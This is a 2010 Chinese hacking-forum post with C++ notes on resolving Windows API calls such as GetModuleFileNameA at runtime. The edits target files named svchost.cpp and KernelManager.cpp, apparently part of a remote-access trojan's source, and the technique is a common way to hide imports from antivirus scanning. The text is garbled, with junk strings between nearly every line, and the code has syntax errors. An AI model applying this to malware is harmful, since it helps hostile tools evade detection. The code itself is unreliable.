标题:
[原创文章]
全局动态调用
[打印本页]
作者:
ice_xke
时间:
2010-10-19 12:30
标题:
全局动态调用
全局动态调用笔记
: A9 S4 M; ]9 o) |
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h
* {! Q" q* J3 }4 K) M! }3 e
----------------------------------------
9 K5 ]- S" L5 e7 @" }; v* `% u
DTDY.h:
9 J1 y9 B7 r- ?% d: E9 R% D
f* B& ~' z2 P3 @, G) X) }( S
#if _MSC_VER>1000
* `3 Q- p/ x5 U0 i: ~, p
#pragma once
1 i0 U1 ] g! m
#endif //_MSC_VER>1000
2 M* \. ^) L, f
#include<windows.h>
- B( s; K' P% V, q+ [+ c& ~0 f
9 |) C5 L: {& ~) @
typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
' c( L0 `1 Z! v) x
class DTDY
% j8 N1 ^6 R" V+ t$ o' o2 z
{
. j5 B! o& L, y8 U. t4 f8 l
public:
0 Q* } `0 V* z6 B7 M* R
DTDY();
* B# K8 u: f7 V# L; w! q
virtual ~DTDY();
2 i3 H3 K/ K" N" v; b. N
public:
# Y# K; G* d2 Y. ^7 P6 T
static pGetModuleFileNameA MyGetModuleFileName;
6 R7 g% V9 y* O+ q* s
static BOOL FunInitiallization();
% A, D9 P' A! x e; ]& r0 G8 K
};
2 ?' k* k% |# a( P( v k: A: a
#endif
/ ^: h4 S2 N( t2 J6 ^* X
----------------------------------------
5 w% O$ d' {& y/ I3 O
, u, k T9 o( c& f
DTDY.cpp:
6 f/ d% d; H- K
+ W3 J- M, T( T( v3 Z+ N% H6 h9 t
#include "DTDY.h"
! v* s: ^* [0 e. e* s
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;
5 K6 o5 n/ b( u* ~
DTDY:TDY()
8 m0 I; s3 W$ \0 \$ c! v
{
( c; x( ~# R% C- S6 t9 M
}
6 H# u" f! C. N* t& Q7 d
DTDY::~DTDY()
! Z/ f0 D5 r' A- h3 E' e0 {! |& y
{
; Z2 S' P' ?( L/ x
}
- D' F1 Q) v0 J; B; R
BOOL DTDY::FunInitiallization()
6 Y( K( C1 E0 G4 `/ z, J
{
# o( `, B' F! e' [9 ?
HMODULE hModule=LoadLibrary("kernel32.dll");
# c/ |& [3 }, i# `% |
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
' y5 ^# c2 p4 Z- t' a' A( v
if(!MyGetModuleFileName=) return FALSE;
0 j; d [1 h. p. ]! q9 |' [
, v f. Z. B: P4 U' P6 i3 V+ {# ?, ~
return TRUE;
1 C" G6 O/ |# m4 s! F* y) A
}
0 }, {! B% C" q9 I5 ]6 X2 ?# n- a, J
----------------------------------------
8 ^, Z9 B9 h6 A0 K( x- s. @) b$ H
svchost.cpp:
7 y. `$ n" H4 b" z& M/ X. k8 _
4 J9 Y3 ^ [* X: ?8 x+ K, O6 ]
#include "DTDY.h"
2 }( a9 @ X4 i6 c2 k4 v
1 d: h* ]: n7 A1 k6 |' _( M3 @
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
$ r, \' t' ?( Y4 ]: x- C
{
% I( G$ _; y2 x$ _8 ~& ]
switch(ul_reason_for_call)
9 k3 Z8 o. c7 @2 g5 D
{
\! [5 B& K4 s7 R! {: n" Z( B
case DLL_PROCESS_ATTACH:
% c) H* W( Y$ `, L& j
if(!DTDY::FunInitiallization()) return FALSE;
( |# R- i2 X6 k
7 W4 G6 D: k0 ]3 F
break;
3 F8 l% j) S7 m
}
# p2 q" o6 {% I, E! z) ~
}
, }6 `+ F2 ?; \4 ?: I& n# \) C7 S
, @. r2 J F4 r( h: m
0 ^1 E& ]' |$ d) C$ r0 ], E
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
0 j) s3 I. M5 e( p9 S( U$ P
改写为
) ~/ `, \6 O; e% }# E; W
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
: n0 N7 R0 m1 A* Q
----------------------------------------
2 A, D+ U/ o, u( d
KernelManager.cpp:
$ a- Z& }9 I9 z1 a
+ I; D. M4 U9 [% a% w
#include "../DTDY.h"
1 Q. J0 W6 N8 [/ U
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
; S$ B [ v, i8 o9 s
改写为
2 k* S: E+ z) V
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
# h; w& i* R6 O5 ~3 h; C- o5 o" b
----------------------------------------
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
